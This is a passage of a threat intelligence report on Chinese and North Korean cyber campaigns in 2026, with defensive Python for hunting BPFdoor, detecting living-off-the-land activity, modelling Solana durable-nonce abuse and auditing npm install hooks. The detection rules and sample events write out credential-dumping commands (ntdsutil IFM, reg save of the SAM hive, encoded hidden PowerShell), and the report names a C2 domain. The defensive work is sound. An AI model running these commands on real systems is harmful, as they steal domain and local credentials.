• BeiDou-3 integration publicly confirmed by Chinese Embassy science counsellor Zhang Heqing on April 8. Military-tier B3A signal provides sub-5-meter accuracy with jam-resistant frequency hopping.
• Trump administration halted Salt Typhoon sanctions to preserve trade truce ahead of the Beijing summit.
• CVE-2026-35616 (Fortinet FortiClient, April 6) and CVE-2026-1340 (Ivanti EPMM, April 8) added to CISA KEV catalog with high Chinese APT exploitation relevance.
• FCC router ban (March 23) explicitly cited Volt, Flax, and Salt Typhoon as justification.
• EU sanctions on Integrity Tech (Flax Typhoon) and i-Soon (March 16) represent most significant expansion of EU cyber sanctions since 2019.
• PLA Cyberspace Force deployment to Fiery Cross Reef in the South China Sea confirmed, signaling offshore cyber warfare capabilities.
• Salt Typhoon remains embedded in 200+ companies across 80+ countries. AT&T and Verizon have not confirmed full eviction.
• Volt Typhoon pre-positioning in U.S. critical infrastructure continues, with CISA supplementary advisory noting intensified activity since mid-2025.
• GoLaxy cognitive warfare database compiled files on 170 Taiwanese politicians and 23 million household registration records.
• Taiwan under sustained attack: 2.63 million cyberattacks per day in 2025, correlated with PLA military exercises.
2.2.2a Detailed Campaign Analysis
FBI DCS-3000 Breach — Counterintelligence Analysis
The penetration of the FBI’s Digital Collection System Network (DCS-3000, internally known as “Red Hook”) represents the most operationally significant Chinese cyber operation disclosed during the reporting period. First detected February 17, 2026, the breach targeted an unclassified system that manages court-authorized surveillance operations including FISA warrants, pen register data, and trap-and-trace device returns. The system captures call metadata—who called whom, when, from where, and websites visited by devices under surveillance—but not call content. The intelligence value to China is profound: knowledge of who the FBI is actively watching can expose undercover assets, tip off PRC operatives under surveillance, and reveal the identities of human intelligence sources developed inside Chinese networks. The attack exploited commercial ISP vendor infrastructure in a supply chain pivot consistent with Salt Typhoon’s established playbook for CALEA infrastructure exploitation. The breach involved FBI systems in the U.S. Virgin Islands rather than FBI headquarters. No formal public attribution has been issued, though methods closely match Salt Typhoon TTPs. Democratic lawmakers have previously warned that telecoms never fully evicted Salt Typhoon, suggesting this may represent a continuation or parallel access path. The timing—approximately six weeks before the scheduled Trump-Xi summit—has significant counterintelligence and diplomatic implications: an adversary with visibility into active FBI surveillance can identify what intelligence the U.S. has on PRC officials participating in summit preparations.
BPFdoor/Red Menshen — Deep Infrastructure Penetration
The BPFdoor campaign disclosed by Rapid7 represents a qualitatively different threat from previous Chinese telecom intrusions. While Salt Typhoon targeted the IT layer (call records, lawful intercept systems), Red Menshen operates at the kernel level, deploying BPF-based implants inside the signaling core of telecom backbone infrastructure. BPFdoor opens no listening port and does not beacon home, so it shows no socket in netstat or standard network monitoring; the implant sniffs traffic through a raw packet socket with a BPF filter attached and remains completely dormant until activated by a specifically crafted “magic packet.” New variants disclosed by Rapid7 include HTTPS-embedded activation using a “magic ruler” technique that ensures the command marker lands at the 26th byte offset, surviving TLS termination and reverse proxies. SCTP signaling filters target 4G and 5G core networks, enabling passive surveillance of mobile subscriber identity and authentication exchanges. ICMP tunneling provides lateral movement between compromised hosts. Process masquerading mimics HPE ProLiant hardware management daemons and Docker container process names in Kubernetes pods. The RH-ISAC published specific SHA256 hashes for multiple BPFdoor variants and controllers on March 31, providing actionable intelligence for threat hunting. F5 Labs identified seven new variants (F through L) with two primary subtypes: httpShell and icmpShell. Source code leaked publicly in 2022 has not spread to commodity threat actors; operational complexity keeps it exclusively in nation-state hands.
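Because the implant never listens on a port, hash-based detection (the RH-ISAC indicators above) has to be paired with a hunt for the one primitive it cannot avoid: a process holding an AF_PACKET socket. The script below is an added example for that hunt; it is not Rapid7, F5 or RH-ISAC tooling. It parses the kernel's /proc/net/packet table, maps each socket inode to the process whose /proc/<pid>/fd points at it, and triages the owner against an allowlist of daemons that legitimately sniff (DHCP clients, tcpdump) and against name patterns an implant may imitate. The sample table, process list, allowlist and masquerade patterns are constructed for this example; `ss -0 -p` gives the same raw data interactively.

```python
import os
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample of /proc/net/packet (the kernel's AF_PACKET socket table).
# Columns: sk RefCnt Type Proto Iface R Rmem User Inode. Proto 0003 is ETH_P_ALL.
SAMPLE_PROC_NET_PACKET = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a1c3b0e8000 3      3    0003   2     1 0      0      48213
ffff9a1c3b0e9800 3      3    0003   0     1 0      0      51907
"""

# Constructed sample of per-process data: pid -> (comm, fd symlink targets).
SAMPLE_FD_MAP: Dict[int, Tuple[str, List[str]]] = {
    1234: ("dhclient", ["socket:[48213]", "/dev/null"]),       # legitimate AF_PACKET user
    4321: ("hpe-ilo-mgmt", ["socket:[51907]", "/dev/null"]),   # name mimics an HPE management daemon
    5555: ("sshd", ["socket:[9999]"]),                         # TCP socket, not in the packet table
}

# Daemons that legitimately hold packet sockets on a typical server; tune per fleet (assumed list).
KNOWN_PACKET_SOCKET_USERS = {"dhclient", "dhcpcd", "tcpdump", "systemd-network", "NetworkManager", "lldpd"}
# Name patterns the reporting says implants imitate (assumed patterns; extend locally).
MASQUERADE_PATTERNS = [r"^hp", r"^ilo", r"^docker", r"^containerd", r"^kube"]


def parse_proc_net_packet(text: str) -> List[int]:
    """Return the socket inodes listed in /proc/net/packet, skipping the header line."""
    inodes = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 9 and fields[8].isdigit():
            inodes.append(int(fields[8]))
    return inodes


def owners_of_inodes(inodes: Iterable[int],
                     fd_map: Dict[int, Tuple[str, List[str]]]) -> List[Tuple[int, str, int]]:
    """Resolve socket inodes to (pid, comm, inode) by matching /proc/<pid>/fd link targets."""
    wanted = {f"socket:[{i}]": i for i in inodes}
    return [(pid, comm, wanted[t]) for pid, (comm, targets) in fd_map.items()
            for t in targets if t in wanted]


def triage(hits: List[Tuple[int, str, int]]) -> List[dict]:
    """Label each packet-socket owner: 'expected' for allowlisted daemons, otherwise 'review'."""
    results = []
    for pid, comm, inode in hits:
        masquerade = any(re.search(p, comm, re.I) for p in MASQUERADE_PATTERNS)
        verdict = "review" if masquerade or comm not in KNOWN_PACKET_SOCKET_USERS else "expected"
        results.append({"pid": pid, "comm": comm, "inode": inode,
                        "masquerade_name": masquerade, "verdict": verdict})
    return results


def live_fd_map() -> Dict[int, Tuple[str, List[str]]]:
    """Collect comm and fd targets from the real /proc (root is needed to read other users' fds)."""
    fd_map = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            fds = [os.readlink(f"/proc/{pid}/fd/{fd}") for fd in os.listdir(f"/proc/{pid}/fd")]
        except OSError:  # process exited or permission denied
            continue
        fd_map[int(pid)] = (comm, fds)
    return fd_map


def hunt(proc_net_packet_text: str = None, fd_map=None) -> List[dict]:
    """Run the hunt on supplied data, or against the live host when nothing is supplied."""
    if proc_net_packet_text is None:
        with open("/proc/net/packet") as f:
            proc_net_packet_text = f.read()
    if fd_map is None:
        fd_map = live_fd_map()
    return triage(owners_of_inodes(parse_proc_net_packet(proc_net_packet_text), fd_map))


if __name__ == "__main__":
    for finding in hunt(SAMPLE_PROC_NET_PACKET, SAMPLE_FD_MAP):
        print(finding)
```

Run `hunt()` with no arguments as root on a Linux host to hunt live. A 'review' verdict is a lead, not a conviction: confirm by checking whether the process binary still exists on disk, whether its name matches its cmdline, and whether a BPF filter is attached (the `ss -0 -b` output shows the filter program).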
Salt Typhoon — Persistent Global Scope
Salt Typhoon remains the most geographically dispersed Chinese APT campaign on record with confirmed victims in 200+ companies across 80+ countries according to FBI figures. Confirmed victims include AT&T, Verizon, T-Mobile, Lumen/CenturyLink, Spectrum/Charter, Windstream, Consolidated Communications, and Viasat. A state National Guard network was compromised, and the access it afforded could reach Guard networks in every other U.S. state and several territories. International reach extends to Canada, UK (Downing Street phone records from 2021–2024), Norway, Netherlands, Italy, Finland, Poland, Argentina, Mexico, Brazil, Myanmar, South Africa, Bangladesh, Indonesia, Malaysia, Thailand, Australia, New Zealand, India, Taiwan, Philippines, and Japan. The Trump administration halted a package of sanctions against China over the Salt Typhoon breach to avoid jeopardizing the Beijing summit and trade negotiations, effectively removing diplomatic deterrence during the highest-risk collection period.
Volt Typhoon Pre-Positioning
CISA issued a supplementary advisory in February 2026 noting Volt Typhoon activity had intensified since mid-2025 with new indicators of compromise in the water and communications sectors. IISS characterized this as having shifted from espionage to pre-positioning for disruptive operations against U.S. critical infrastructure in a Taiwan contingency, describing it as redrawing “the boundary for acceptable state behavior in cyberspace.” Key targets include Guam port and air base networks, electric utilities, water treatment SCADA/ICS, oil and gas pipelines, satellite communications, and military logistics contractors. Volt Typhoon employs Living-off-the-Land tradecraft using native Windows tools (wmic, netsh, ntdsutil, PowerShell) with SOHO router botnets for traffic obfuscation. The campaign represents the most sustained pre-positioning operation against U.S. critical infrastructure by a foreign adversary ever documented.
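Living-off-the-Land tradecraft leaves no malware to hash, so detection has to key on how the native tools are invoked. The following is an added example, not CISA's or any vendor's rule set: a small rule engine run over constructed process-creation events in the shape of Windows Security 4688 / Sysmon Event ID 1 (the field names `host`, `user`, `parent`, `cmdline` are assumptions; map your own telemetry to them). The rules cover the tools named above in their abusive forms (ntdsutil IFM dumps, netsh portproxy pivots, wmic remote process creation, encoded PowerShell, registry hive saves, shadow-copy creation) while letting benign `netsh wlan` through, and the per-host grouping is what turns single hits into a chain worth escalating.

```python
import re
from typing import Dict, List

# Constructed process-creation events (field names assumed for this example).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "dc01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" "ifm" "create full C:\\Windows\\Temp\\pro" q q'},
    {"host": "fw-mgmt", "user": "CORP\\admin2", "parent": "cmd.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 "
                "connectport=8443 connectaddress=10.2.0.5"},
    {"host": "ws17", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "cmdline": 'wmic process call create "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"'},
    {"host": "ws17", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "srv03", "user": "CORP\\admin1", "parent": "cmd.exe",
     "cmdline": "reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv"},
    {"host": "ws22", "user": "CORP\\asmith", "parent": "explorer.exe",
     "cmdline": "netsh wlan show profiles"},  # benign netsh use, must not fire
    {"host": "dc01", "user": "CORP\\svc_backup", "parent": "services.exe",
     "cmdline": "vssadmin create shadow /for=C:"},
]

# Each rule: name, MITRE ATT&CK technique, case-insensitive regex over the command line.
RULES = [
    ("ntdsutil_ifm_dump", "T1003.003", r"ntdsutil(\.exe)?.*\b(ifm|ac\s+i\s+ntds)\b"),
    ("netsh_portproxy_add", "T1090.001", r"netsh.*\bportproxy\b.*\badd\b"),
    ("wmic_remote_process", "T1047", r"wmic.*\bprocess\b.*\bcall\b.*\bcreate\b"),
    ("powershell_encoded", "T1059.001", r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\b"),
    ("reg_save_hive", "T1003.002", r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b"),
    ("vss_shadow_create", "T1003.003", r"(vssadmin.*create\s+shadow|wmic.*shadowcopy\s+call\s+create)"),
]
COMPILED = [(name, technique, re.compile(rx, re.I)) for name, technique, rx in RULES]


def match_event(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per rule whose regex matches the event's command line."""
    findings = []
    for name, technique, rx in COMPILED:
        if rx.search(event.get("cmdline", "")):
            findings.append({"rule": name, "technique": technique, "host": event["host"],
                             "user": event["user"], "cmdline": event["cmdline"]})
    return findings


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [f for e in events for f in match_event(e)]


def by_host(findings: List[Dict[str, str]]) -> Dict[str, set]:
    """Group rule names per host so a chain (credential dump + proxy + encoded PS) stands out."""
    grouped: Dict[str, set] = {}
    for f in findings:
        grouped.setdefault(f["host"], set()).add(f["rule"])
    return grouped


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f["host"], f["rule"], f["technique"], f["cmdline"][:60])
    print(by_host(hits))
```

Expect noise from backup software (ntdsutil IFM) and admin scripting (encoded PowerShell); the useful signal is a host or account accumulating more than one rule, or any hit on a device that should never run these tools at all, such as an OT jump host.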
Taiwan Sustained Cyber Pressure
Taiwan’s National Security Bureau annual report (January 2026) documented Chinese cyberattacks averaging 2.63 million per day against Taiwan critical infrastructure in 2025, a 6% increase year-over-year and 113% increase from 2023 baseline. Attacks correlated with 23 of 40 PLA joint combat readiness patrols, confirming hybrid threat doctrine. The GoLaxy database compiled by a PRC state-affiliated firm contains files on 170 Taiwanese politicians, 23 million household registration records (Taiwan’s entire population), and databases of U.S. political figures, designed to power a smart propaganda system using AI bots. The top five Chinese hacker groups against Taiwan are BlackTech, Flax Typhoon, Mustang Panda, APT41, and UNC3886.
PLA Cyberspace Force — Structural Assessment
The PLA Cyberspace Force, established April 19, 2024 following the dissolution of the Strategic Support Force’s Network Systems Department, represents China’s most significant military cyber reorganization in a decade. Commanded by Zhang Minghua with Han Xiaodong as political commissar, the force operates five Technical Reconnaissance Bases aligned with PLA’s five theater commands and a Cyberspace Operations Base overseeing offensive cyberwarfare, psychological warfare, and advanced cybersecurity research. Xi Jinping’s February 12, 2026 Lunar New Year video message revealed for the first time a PLA Cyberspace Force unit stationed on Fiery Cross Reef (Yongshu Jiao) in the disputed Spratly Islands, conducting “combat readiness duty.” This deployment places Chinese state cyber operators in closer physical proximity to undersea cable infrastructure, regional telecommunications nodes, and military networks of U.S. allies including the Philippines, Vietnam, Malaysia, and Indonesia. The force made its first public appearance at the China Victory Day Parade on September 3, 2025.
GoLaxy Cognitive Warfare Database
Leaked documents from PRC state-affiliated firm GoLaxy, analyzed by Doublethink Lab (published March 4, 2026, based on August 2025 leaked documents), reveal a comprehensive cognitive warfare infrastructure targeting Taiwan. The GoLaxy database compiled files on 170 Taiwanese politicians (including President Lai), all 23 million Taiwanese household registration records, academics, business figures, and religious leaders. The database enabled AI/ML-driven targeting, ideological classification (including “attitude toward China”), and weekly public opinion reports. GoLaxy sought funding and guidance from the Cyberspace Administration of China, Central Propaganda Department, and Ministry of State Security. The system was designed to power a “smart propaganda system” using AI bots for targeted propaganda operations. This represents active cognitive warfare infrastructure targeting Taiwan ahead of upcoming elections and constitutes the most comprehensive publicly documented foreign influence database ever disclosed.
China’s Amended Cybersecurity Law
China’s amended Cybersecurity Law, effective January 1, 2026, introduced provisions with direct implications for the global cyber threat landscape. Mandatory vulnerability disclosure to the Ministry of State Security within 48 hours gives the MSS a head start on zero-days before vendors are notified—a structural advantage for Chinese offensive cyber operations. Extraterritorial enforcement provisions target any person or organization globally whose actions “endanger China’s cybersecurity,” creating legal cover for retaliatory actions against foreign security researchers. Significantly increased fines (up to RMB 10 million for serious violations) and a new prohibition on unauthorized public vulnerability releases further consolidate state control over the vulnerability ecosystem.
Trump Administration Cyber Strategy — China Omission
The March 2026 White House cyber strategy (approximately 4 pages, one-seventh the length of Biden’s 2023 strategy) does not mention China, Iran, North Korea, or Russia by name—despite the FBI identifying China as “the most active and persistent cyber threat” to U.S. networks. The CFR assessed a growing gap between the stated U.S. cyber dominance posture and actual capacity, noting that “Chinese operators remain embedded in U.S. infrastructure.” The Trump administration’s decision to halt MSS sanctions plans to avoid disrupting the trade truce removes a significant deterrent during the highest-risk pre-summit intelligence collection period. NSM-22 (critical infrastructure security requirements) is under reconsideration with updates expected May 2026.
2.2.3 TTPs
Chinese APT TTPs reflect sophisticated multi-vector operations: ISP vendor supply chain exploitation for access to law enforcement systems; kernel-level BPF-based implants that operate below standard monitoring tools; DLL sideloading triads with custom PlugX payloads; Microsoft Entra ID OAuth redirect abuse; Living-off-the-Land techniques using native Windows tools; and exploitation of edge devices (Fortinet, Ivanti, Citrix) for initial access. Storm-1175’s 24-hour access-to-ransomware timeline represents a significant acceleration in Chinese-speaking threat actor operational tempo.
2.2.5 Assessment and Outlook
China’s cyber threat level is assessed as CRITICAL and represents the most persistent structural threat to U.S. national security in cyberspace. The DCS-3000 breach, if confirmed as Salt Typhoon, would represent the most consequential intelligence compromise since the OPM breach. The pre-summit espionage window creates maximum collection incentive coincident with minimum U.S. detection capability due to CISA degradation. BeiDou confirmation fundamentally alters the strategic calculus in the Gulf and establishes a template applicable to a Taiwan contingency. Near-term watch items include formal DCS-3000 attribution, Trump-Xi summit cyber deliverables, and exploitation of newly added CISA KEV entries.
2.3 North Korea
2.3.1 Strategic Overview
North Korean cyber operations continue at CRITICAL tempo with lifetime cryptocurrency theft now exceeding $6.7 billion. The Q1 2026 pace of $300M+ stolen across 18 attacks (Elliptic) suggests annualized theft approaching $1.2B if sustained. The Drift Protocol heist represents the most sophisticated DPRK social engineering operation ever documented, featuring in-person conference attendance and real capital investment. The Axios npm supply chain attack demonstrates continued evolution of software supply chain compromise methodology following the 3CX precedent. Approximately 100,000 DPRK IT workers across 40+ countries generate approximately $500M annually for the regime. The DNI 2026 Annual Threat Assessment confirms DPRK’s cyber program as “sophisticated and agile.”
2.3.2 Key Developments
• Drift Protocol $286M Heist (April 1, attributed April 5): UNC4736/Citrine Sleet/Golden Chollima conducted a six-month social engineering operation targeting Drift Protocol, Solana’s largest perpetual futures exchange. Operatives attended cryptocurrency conferences in person, deposited $1M+ in real capital, created a fake CarbonVote Token, and exploited Solana durable nonces to drain $286M in 12 minutes across 31 transactions. Attribution linked to Radiant Capital October 2024 attackers.
• Axios npm Supply Chain Attack (March 31): UNC1069/Sapphire Sleet/NICKEL GLADSTONE compromised the Axios npm package (100M+ weekly downloads) via hijacked maintainer account. Deployed SILKBELL dropper and WAVESHAPER.V2 cross-platform RAT. Maintainer postmortem (April 6) revealed two-week rapport-building operation with fake Slack workspace. 135 confirmed compromised devices. Transitive propagation through @wordpress/scripts and Datadog packages confirmed.
• Q1 2026 pace: $300M+ stolen across 18 attacks according to Elliptic.
• DOJ IT Worker Sentencing (March 20): Three defendants sentenced including an active-duty U.S. Army soldier at Fort Gordon who ran a laptop farm for DPRK IT workers for approximately three years.
• IBM X-Force/Flare Research (March 18): Approximately 100,000 DPRK IT workers across 40+ countries generating $500M/year with documented use of PiKVM, AstrillVPN, and AI-assisted interviews.
• Bybit $1.46B laundering essentially complete by the one-year mark.
• Contagious Interview/StegaBin campaigns continue with VS Code tasks.json auto-execution technique confirmed in Drift attack.
• Lazarus Medusa ransomware deployed against U.S. healthcare targets.
• OFAC March 12 sanctions: 6 individuals, 2 entities, 21 cryptocurrency addresses designated.
2.3.2a Detailed Campaign Analysis
Drift Protocol Attack — Operational Timeline
The Drift Protocol attack represents a paradigm shift in DPRK social engineering sophistication. Beginning in Fall 2025, UNC4736 operatives attended major cryptocurrency conferences worldwide posing as representatives of a quantitative trading firm. They built rapport with Drift Protocol contributors over Telegram, engaging in substantive conversations on trading strategies and vault integrations. Between December 2025 and January 2026, the fake trading group onboarded an Ecosystem Vault on Drift Protocol and deposited over $1 million in real capital—an unprecedented financial commitment to a social engineering operation. Between February and March 2026, operatives shared links to “projects, tools, and applications” serving as infection vectors. Around March 11, the attacker withdrew 10 ETH from Tornado Cash as operational funding. On March 12 at approximately 09:00 Korea Standard Time, they deployed the CarbonVote Token (CVT) on Solana—the timestamp serving as an attribution indicator. Over the following weeks, wash trades on Raydium DEX maintained CVT’s price near $1.00, causing Drift’s oracles to accept it as legitimate collateral. Between March 23 and 30, Solana “durable nonces” were used to induce Security Council multisig members to pre-sign seemingly routine transactions. On March 27, Drift migrated its Security Council to a 2-of-5 threshold and removed the timelock entirely, creating a zero-delay execution window. On April 1, the attack executed: CVT was listed as collateral, withdrawal limits were raised, 785 million CVT were deposited, and 31 withdrawals in 12 minutes drained $286M in JLP, USDC, SOL, wBTC, and wETH. Circle’s Cross-Chain Transfer Protocol was used to bridge $230M+ from Solana to Ethereum; Circle took six hours to freeze funds—well after most holdings had been converted.
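The durable-nonce step is the mechanical heart of the attack and is easy to misread, so here is a simplified model of it as an added example (it is not Drift's code, not the Solana runtime, and does not use a Solana SDK; program names such as `drift_v2` and instruction labels such as `AddCollateralAsset` are illustrative assumptions). An ordinary Solana transaction carries a recent blockhash and is dropped once that hash ages out of the cluster's window of roughly 150 slots, so a signature collected in March is worthless in April. A transaction whose first instruction is the System Program's `AdvanceNonceAccount` instead carries the value stored in a nonce account and stays valid until that account is advanced, however long that takes. The `signer_policy` function shows the check a multisig member can apply before signing: refuse durable-nonce transactions unless explicitly planned, and refuse anything that touches privileged instructions.

```python
import hashlib
from collections import deque
from dataclasses import dataclass
from typing import Dict, List

MAX_BLOCKHASH_AGE = 150  # ordinary transactions expire once their blockhash is ~150 slots old
SYSTEM_PROGRAM = "11111111111111111111111111111111"
# Illustrative labels (assumption) for the kinds of instructions the attack needed pre-signed.
PRIVILEGED = {"AddCollateralAsset", "UpdateWithdrawLimit", "SetCouncilThreshold", "RemoveTimelock"}


@dataclass
class Instruction:
    program: str
    name: str
    accounts: List[str]


@dataclass
class Transaction:
    recent_blockhash: str
    instructions: List[Instruction]


class Ledger:
    """Toy cluster state: a rolling window of recent blockhashes plus nonce accounts."""
    def __init__(self):
        self.slot = 0
        self.recent = deque(maxlen=MAX_BLOCKHASH_AGE)
        self.nonce_accounts: Dict[str, str] = {}
        self.advance_slots(1)

    @staticmethod
    def _h(s: str) -> str:
        return hashlib.sha256(s.encode()).hexdigest()[:16]

    def blockhash(self) -> str:
        return self.recent[-1]

    def advance_slots(self, n: int) -> None:
        for _ in range(n):
            self.slot += 1
            self.recent.append(self._h(f"slot:{self.slot}"))

    def create_nonce_account(self, pubkey: str) -> str:
        self.nonce_accounts[pubkey] = self._h(f"nonce:{pubkey}:{self.blockhash()}")
        return self.nonce_accounts[pubkey]

    def advance_nonce(self, pubkey: str) -> None:
        """Executing the durable tx (or deliberately advancing the nonce) invalidates old signatures."""
        self.nonce_accounts[pubkey] = self._h(f"nonce:{pubkey}:{self.blockhash()}")


def uses_durable_nonce(tx: Transaction) -> bool:
    first = tx.instructions[0] if tx.instructions else None
    return bool(first and first.program == SYSTEM_PROGRAM and first.name == "AdvanceNonceAccount")


def is_processable(tx: Transaction, ledger: Ledger) -> bool:
    """Durable tx: valid while the nonce account still holds tx.recent_blockhash.
    Ordinary tx: valid only while its blockhash is inside the recent window."""
    if uses_durable_nonce(tx):
        nonce_acct = tx.instructions[0].accounts[0]
        return ledger.nonce_accounts.get(nonce_acct) == tx.recent_blockhash
    return tx.recent_blockhash in ledger.recent


def signer_policy(tx: Transaction, allowed_programs: set) -> List[str]:
    """Reasons a multisig member should refuse to sign; empty list means sign."""
    reasons = []
    if uses_durable_nonce(tx):
        reasons.append("durable nonce: signature would never expire; refuse unless explicitly planned")
    for ins in tx.instructions:
        is_nonce_advance = ins.program == SYSTEM_PROGRAM and ins.name == "AdvanceNonceAccount"
        if ins.program not in allowed_programs and not is_nonce_advance:
            reasons.append(f"unexpected program {ins.program} ({ins.name})")
        if ins.name in PRIVILEGED:
            reasons.append(f"privileged instruction {ins.name}: requires out-of-band verification")
    return reasons


def demo() -> Dict[str, object]:
    ledger = Ledger()
    ordinary = Transaction(ledger.blockhash(), [Instruction("drift_v2", "UpdateVaultFee", ["vault"])])
    nonce_value = ledger.create_nonce_account("nonce_acct")
    durable = Transaction(nonce_value, [
        Instruction(SYSTEM_PROGRAM, "AdvanceNonceAccount", ["nonce_acct", "authority"]),
        Instruction("drift_v2", "AddCollateralAsset", ["spot_market", "cvt_mint"]),
        Instruction("drift_v2", "UpdateWithdrawLimit", ["spot_market"]),
    ])
    out = {"ordinary_valid_at_signing": is_processable(ordinary, ledger),
           "durable_valid_at_signing": is_processable(durable, ledger)}
    ledger.advance_slots(2000)  # the weeks between pre-signing and execution
    out["ordinary_valid_later"] = is_processable(ordinary, ledger)
    out["durable_valid_later"] = is_processable(durable, ledger)
    ledger.advance_nonce("nonce_acct")
    out["durable_valid_after_advance"] = is_processable(durable, ledger)
    out["policy_reasons"] = signer_policy(durable, {"drift_v2"})
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The practical control that falls out of the model is the last line of `demo()`: a signer can mechanically refuse any transaction whose first instruction advances a nonce, and a council can routinely advance its own nonce accounts to void anything pre-signed. With the timelock removed on March 27, nothing downstream would have caught what the signers let through.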
Axios npm Supply Chain — Attack Mechanics
The Axios attack demonstrated pre-staged multi-target capability: both the 0.x and 1.x release branches were hit within 40 minutes, reflecting detailed advance planning. The attackers compromised maintainer account @jasonsaayman using a long-lived classic npm access token that bypassed GitHub Actions OIDC workflow protections. Eighteen hours prior, they published a clean decoy package (plain-crypto-js@4.2.0) to reduce scrutiny. The only modification to Axios itself was addition of plain-crypto-js as a dependency—the package was never imported in source code, relying purely on npm’s postinstall hook mechanism. The SILKBELL dropper used two-layer obfuscation (reversed Base64 + XOR cipher with key “OrDeR_7077” and constant 333) and dynamically loaded Node.js modules to evade static analysis. Anti-forensic cleanup deleted the dropper and malicious package.json, replacing them with clean stubs. WAVESHAPER.V2 deployed platform-specific persistence: macOS payloads masqueraded as Apple system caches, Windows payloads disguised themselves as Windows Terminal, and Linux variants used nohup persistence. The C2 beacon at sfrclak[.]com contacted every 60 seconds using an anachronistic Internet Explorer 8 user-agent string. Transitive dependency propagation was confirmed through @wordpress/scripts and Datadog yarn packages, meaning organizations that never directly installed Axios could still be compromised through nested dependencies.
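Two facts above are checkable mechanically in any dependency tree: a package that runs a lifecycle script at install time, and a dependency that is declared but never imported. The script below is an added example (not the Axios project's code, npm's, or any vendor's scanner) that walks a `node_modules` tree for `preinstall`/`install`/`postinstall`/`prepare` scripts and compares a target package's declared dependencies against the modules its own JavaScript actually requires or imports. The sample tree it builds in a temporary directory is constructed to mirror the shape described above (a version label of `0.0.0-sample`, a fictitious `setup.js`), not a copy of the malicious package.

```python
import json
import os
import re
import tempfile
from typing import Dict, List

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# require('x'), from 'x', import 'x'; relative paths (./ or ../) are excluded by the first char class.
IMPORT_RX = re.compile(r"""(?:require\(\s*|from\s+|import\s+)['"]([^'"./][^'"]*)['"]""")


def package_name(spec: str) -> str:
    """'@scope/pkg/sub' -> '@scope/pkg'; 'pkg/sub' -> 'pkg'."""
    parts = spec.split("/")
    return "/".join(parts[:2]) if spec.startswith("@") else parts[0]


def lifecycle_scripts(root: str) -> List[Dict[str, str]]:
    """Every package under root that declares an install-time script."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json")) as f:
                pkg = json.load(f)
        except (OSError, ValueError):
            continue
        for hook in LIFECYCLE:
            if hook in pkg.get("scripts", {}):
                hits.append({"package": pkg.get("name", dirpath), "hook": hook,
                             "command": pkg["scripts"][hook], "path": dirpath})
    return hits


def declared_but_unused(pkg_dir: str) -> List[str]:
    """Dependencies listed in package.json that no JS/TS file in the package imports."""
    with open(os.path.join(pkg_dir, "package.json")) as f:
        pkg = json.load(f)
    declared = set(pkg.get("dependencies", {}))
    used = set()
    for dirpath, dirs, files in os.walk(pkg_dir):
        dirs[:] = [d for d in dirs if d != "node_modules"]
        for name in files:
            if name.endswith((".js", ".mjs", ".cjs", ".ts")):
                with open(os.path.join(dirpath, name), errors="ignore") as f:
                    used.update(package_name(m) for m in IMPORT_RX.findall(f.read()))
    return sorted(declared - used)


def audit(root: str, target_pkg_dir: str) -> Dict[str, object]:
    return {"install_scripts": lifecycle_scripts(root),
            "unused_dependencies": declared_but_unused(target_pkg_dir)}


def build_sample_tree(root: str) -> str:
    """Constructed node_modules: a library gaining a never-imported dependency that carries a postinstall."""
    lib = os.path.join(root, "node_modules", "axios")
    os.makedirs(os.path.join(lib, "lib"))
    with open(os.path.join(lib, "package.json"), "w") as f:
        json.dump({"name": "axios", "version": "0.0.0-sample",
                   "dependencies": {"plain-crypto-js": "^4.2.0", "follow-redirects": "^1.15.0"}}, f)
    with open(os.path.join(lib, "lib", "index.js"), "w") as f:
        f.write("const follow = require('follow-redirects');\nmodule.exports = {};\n")
    dep = os.path.join(root, "node_modules", "plain-crypto-js")
    os.makedirs(dep)
    with open(os.path.join(dep, "package.json"), "w") as f:
        json.dump({"name": "plain-crypto-js", "version": "4.2.0",
                   "scripts": {"postinstall": "node setup.js"}}, f)  # fictitious script name
    return lib


def run_sample() -> Dict[str, object]:
    with tempfile.TemporaryDirectory() as tmp:
        return audit(tmp, build_sample_tree(tmp))


if __name__ == "__main__":
    print(json.dumps(run_sample(), indent=2))
```

Point `audit()` at a real project's `node_modules` and its package directory. Install scripts are common in packages that compile native code, so the list is a review queue rather than an alert; the combination that matters is a new dependency whose only role is to exist, plus a hook. Installing with `npm ci --ignore-scripts` in CI neutralises the hook entirely, at the cost of having to run necessary build steps explicitly.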
IT Worker Operations — Scale and Sophistication
